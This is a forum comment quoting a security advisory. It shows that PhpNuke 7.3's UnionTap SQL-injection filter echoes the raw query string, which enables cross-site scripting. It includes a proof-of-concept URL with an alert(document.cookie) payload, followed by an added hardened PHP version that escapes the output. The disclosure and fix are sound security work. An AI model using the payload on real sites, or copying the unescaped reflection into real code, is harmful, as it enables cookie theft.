Re: Fortress™ Request for Comments (Score: 1) by inkydink1234 on Monday, May 17 @ 21:46:00 CEST
From the Waraxe site:
B5 - XSS through nukecops UnionTap Sql Prevention Code:
Well, you know, this is my favourite one - securing one hole will induct new one.
Let's look at beginning of the "mainfile.php" from PhpNuke 7.3 :
//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /", rawurldecode($loc=$_SERVER["QUERY_STRING"]), $matches)) {
die("YOU ARE SLAPPED BY NUKECOPS [nukecops.com] BY USING '$matches[1]' INSIDE '$loc'.");
}
So this clever code will catch up nonmasked sql injection attempts, made through "GET" request...
Let's try this request:
http://localhost/nuke73/index.php?foo=bar%20union%20select
and we see nice message like this:
YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE 'foo=bar%20union%20select'.
Uh, how scary...
But what, if we issue request like this (try it with M$ Internet Explorer for success!):
http://localhost/nuke73/index.php?foo=bar%20union%20select%20alert(document.cookie);
Oops, nice case of cross-site scripting! And because anti-xss filtering code is located
AFTER UnionTap, then we can use even most common "" tags...
Heya to nukecops and have a nice day
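A hardened form of the check quoted in the comment above, as an added example that is not part of the original post and is not PhpNuke or nukecops code. It keeps the quoted pattern but HTML-escapes everything reflected into the rejection message; the function name `union_check_message` and the sample query strings are constructed for illustration.

```php
<?php
// Added example: not PhpNuke or nukecops code. The function name and the
// sample query strings below are constructed for illustration.

/**
 * Runs the same keyword pattern as the quoted check, but returns an
 * HTML-safe rejection message instead of interpolating raw input.
 * Returns null when the pattern does not match.
 */
function union_check_message(string $rawQuery): ?string
{
    if (!preg_match('/([OdWo5NIbpuU4V2iJT0n]{5}) /', rawurldecode($rawQuery), $m)) {
        return null;
    }
    // Both values come from the request, so both are escaped before they
    // reach the response body. ENT_QUOTES also covers attribute contexts.
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return sprintf(
        "Request rejected: '%s' found in '%s'.",
        htmlspecialchars($m[1], $flags, 'UTF-8'),
        htmlspecialchars($rawQuery, $flags, 'UTF-8')
    );
}

// Constructed samples: a clean query, the keyword alone, and the keyword
// followed by literal markup (as sent by a client that does not
// percent-encode angle brackets in the query string).
$samples = [
    'name=News&file=article',
    'foo=bar%20union%20select',
    'foo=bar%20union%20select%20<b>markup</b>',
];

foreach ($samples as $query) {
    $message = union_check_message($query);
    echo $message ?? 'passed: no keyword match', PHP_EOL;
}
```

The third sample comes back with `&lt;b&gt;markup&lt;/b&gt;` in the message, so the rejection page shows the markup as text instead of rendering it. Logging the raw query server-side and returning a fixed message removes the reflection sink entirely.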